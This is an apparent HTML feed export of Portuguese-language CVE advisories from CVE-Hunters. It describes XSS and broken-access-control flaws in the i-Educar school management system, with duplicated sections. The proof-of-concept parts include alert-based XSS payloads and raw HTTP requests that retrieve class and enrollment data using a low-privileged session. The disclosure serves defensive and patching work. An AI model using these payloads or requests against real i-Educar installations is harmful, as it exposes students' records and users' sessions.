src="/p/cve-2025-10591/image.png" width="1193" height="615" srcset="/p/cve-2025-10591/image_hu_9dfb1cc0643b24b3.png 480w, /p/cve-2025-10591/image_hu_a0e3d84ac9dcf37.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-10591/image-1.png" width="1228" height="568" srcset="/p/cve-2025-10591/image-1_hu_1c1df20dcb8f0e5d.png 480w, /p/cve-2025-10591/image-1_hu_10a5213779d6b9a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="518px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10605/ https://www.cvehunters.com/pt/p/cve-2025-10605/ <h2 id="cve-2025-10605-cross-site-scripting-xss-refletido-no-endpoint-agenda_preferenciasphp-parâmetro-tipoacao">CVE-2025-10605: Cross-Site Scripting (XSS) Refletido no endpoint <code>agenda_preferencias.php</code> parâmetro <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10605</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>agenda_preferencias.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>tipoacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/agenda_preferencias.php</code></p> <p>Parâmetro: <code>tipoacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-10605-cross-site-scripting-xss-refletido-no-endpoint-agenda_preferenciasphp-parâmetro-tipoacao">CVE-2025-10605: Cross-Site Scripting (XSS) Refletido no endpoint <code>agenda_preferencias.php</code> parâmetro <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10605</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>agenda_preferencias.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>tipoacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/agenda_preferencias.php</code></p> <p>Parâmetro: <code>tipoacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10605/image.png" width="736" height="565" srcset="/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="312px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10606/ https://www.cvehunters.com/pt/p/cve-2025-10606/ <h2 id="cve-2025-10606-cross-site-scripting-xss-refletido-no-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parâmetro-tipoacao">CVE-2025-10606: Cross-Site Scripting (XSS) Refletido no endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> parâmetro <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10606</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>tipoacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code></p> <p>Parâmetro: <code>tipoacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-10606-cross-site-scripting-xss-refletido-no-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parâmetro-tipoacao">CVE-2025-10606: Cross-Site Scripting (XSS) Refletido no endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> parâmetro <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10606</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>tipoacao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code></p> <p>Parâmetro: <code>tipoacao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>q</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">%22%3E%3Cimg%20src=x%20onerror=alert('XSS-PoC4')%3E </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10606/image.png" width="746" height="542" srcset="/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="330px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10607/ https://www.cvehunters.com/pt/p/cve-2025-10607/ <h2 id="cve-2025-10607-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleavaliacaodiarioapi">CVE-2025-10607: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via <code>/module/Avaliacao/diarioApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10607</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Avaliacao/diarioApi</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma <b>divulgação não autorizada de informações de estrutura acadêmica</b>, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.</p><h2 id="cve-2025-10607-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleavaliacaodiarioapi">CVE-2025-10607: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via <code>/module/Avaliacao/diarioApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10607</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/Avaliacao/diarioApi</code> do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.</br></br>Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma <b>divulgação não autorizada de informações de estrutura acadêmica</b>, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint vulnerável:</b> <code>GET /module/Avaliacao/diarioApi</code></br></br>O aplicativo não consegue aplicar a <b>autorização em nível de objeto</b> ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.</p> <p style="text-align: justify;"><b>Comportamento esperado:</b><ul><li>Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.</li><li>Usuários não autorizados devem receber a mensagem 403 "Proibido" ou uma resposta vazia.</li></ul></p> <p style="text-align: justify;"><b>Comportamento observado:</br></b><ul><li>Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autentique como um usuário sem privilégios (por exemplo, aluno, professor).</li></ul></p> <p><img src="/p/cve-2025-10607/image.png" width="1439" height="663" srcset="/p/cve-2025-10607/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10607/image_hu_ecdded4f672254a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="520px" /></p> <p><img src="/p/cve-2025-10607/image-1.png" width="846" height="616" srcset="/p/cve-2025-10607/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10607/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Envie a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12&busca=S&mostrar_botao_replicar_todos=1&ano=2025&ref_cod_instituicao=1&ref_cod_escola=3&ref_cod_curso=4&ref_cod_serie=6&ref_cod_turma=3&etapa=1&ref_cod_componente_curricular=11&ref_cod_matricula=12&navegacao_tab=2 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/Avaliacao/diario?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12 </span></span><span class="line"><span class="cl">Cookie: educar_session=[low-privileged-session] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10607/image-2.png" width="1437" height="673" srcset="/p/cve-2025-10607/image-2_hu_b84de71ce4393634.png 480w, /p/cve-2025-10607/image-2_hu_47595ad6e39df54f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="213" data-flex-basis="512px" /></p> <p style="text-align: justify;"><ul><li>Pudemos observar que informações sobre classes foram retornadas.</li></ul></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a: <ul> <li>Acesso não autorizado a PII sensíveis;</li> <li>Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);</li> <li>Possível abuso de dados do usuário ou personificação;</li> <li>Enumeração de usuários.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10608/ https://www.cvehunters.com/pt/p/cve-2025-10608/ <h2 id="cve-2025-10608-controle-de-acesso-quebrado-no-endpoint-enrollment-historyid">CVE-2025-10608: Controle de Acesso Quebrado no Endpoint <code>/enrollment-history/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10608</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/enrollment-history/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /enrollment-history/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-10608-controle-de-acesso-quebrado-no-endpoint-enrollment-historyid">CVE-2025-10608: Controle de Acesso Quebrado no Endpoint <code>/enrollment-history/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10608</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/enrollment-history/[ID]</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /enrollment-history/[ID]</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-10608/image.png" width="1439" height="663" srcset="/p/cve-2025-10608/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10608/image_hu_ecdded4f672254a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="520px" /></p> <p><img src="/p/cve-2025-10608/image-1.png" width="936" height="436" srcset="/p/cve-2025-10608/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10608/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte solicitação:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /enrollment-history/206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função de cadastrar alunos nas turmas. E este usuário não deveria fazer isso.</li></ul></p> <p><img src="/p/cve-2025-10608/image-2.png" width="1617" height="702" srcset="/p/cve-2025-10608/image-2_hu_2bddda474495b951.png 480w, /p/cve-2025-10608/image-2_hu_ff39a09242bf73ba.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="552px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10372/ https://www.cvehunters.com/pt/p/cve-2025-10372/ <h2 id="cve-2025-10372-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_modulo_cadphp">CVE-2025-10372: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_modulo_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10372" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10372</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_modulo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_modulo_cad.php</code></p><h2 id="cve-2025-10372-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_modulo_cadphp">CVE-2025-10372: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_modulo_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10372" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10372</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_modulo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_modulo_cad.php</code></p> <p>Parâmetros:<code>nm_tipo</code> e <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img 